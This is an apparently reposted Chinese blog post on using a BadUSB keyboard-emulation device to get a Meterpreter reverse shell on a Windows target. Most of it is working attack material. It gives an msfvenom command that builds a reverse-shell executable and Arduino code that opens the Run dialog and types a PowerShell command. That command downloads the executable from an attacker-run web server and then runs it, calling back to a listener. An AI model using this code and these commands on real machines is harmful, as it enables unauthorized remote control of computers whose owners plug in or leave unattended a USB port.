badusb_反弹meterpreter

来源:互联网 发布:数据库开发工程师累吗 编辑:程序博客网 时间:2024/04/28 18:26

转载请注明来自 b0t0w1’blog

本次思路是在本地生成 exploit,放在服务器上可供下载或者直接在本地搭建服务器。

生成 exploit:

msfvenom -p payload lhost=192.168.99.130 lport=4444 -f exe -o 1.exe

烧录payload:

char *command1 = "powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://192.168.99.132/1.exe';$file = ' %HOMEPATH%\\1.exe ';$clnt.DownloadFile($url,$file);";char *command2 = "%HOMEPATH%\\1.exe";void setup() {     delay(5000);    omg(command1);    delay(10000);    omg(command2); }void loop() {}void omg(char *SomeCommand){  Keyboard.set_modifier(128);   Keyboard.set_key1(KEY_R);  Keyboard.send_now();   Keyboard.set_modifier(0);   Keyboard.set_key1(0);   Keyboard.send_now();   delay(1500);  Keyboard.println(SomeCommand);}

生成的exploit的ip和端口为监听机的地址及端口。
烧录的payload同样来自于kali set工具集,用杨依赖于powershell。需要注意以下几点:
1、commond1的命令是从指定ip(192.168.99.132)下载指定文件(1.exe),ip不一定是监听机,而是你搭建好的、存放着exploit的服务器ip
2、我在另一个虚拟机上搭建了web,上传1.exe,ip地址为192.168.99.132
3、默认下载的位置是在环境变量 HOMEPATH 的位置,command2就是运行exploit(第8行),第七行代码会延迟10妙供下载,可以根据实际改变。
监听选用meterpreter,
这里写图片描述
附服务器(192.168.99.132)的日志,确实有靶机的访问记录。
这里写图片描述

转载请注明来自 b0t0w1’blog

0 0
原创粉丝点击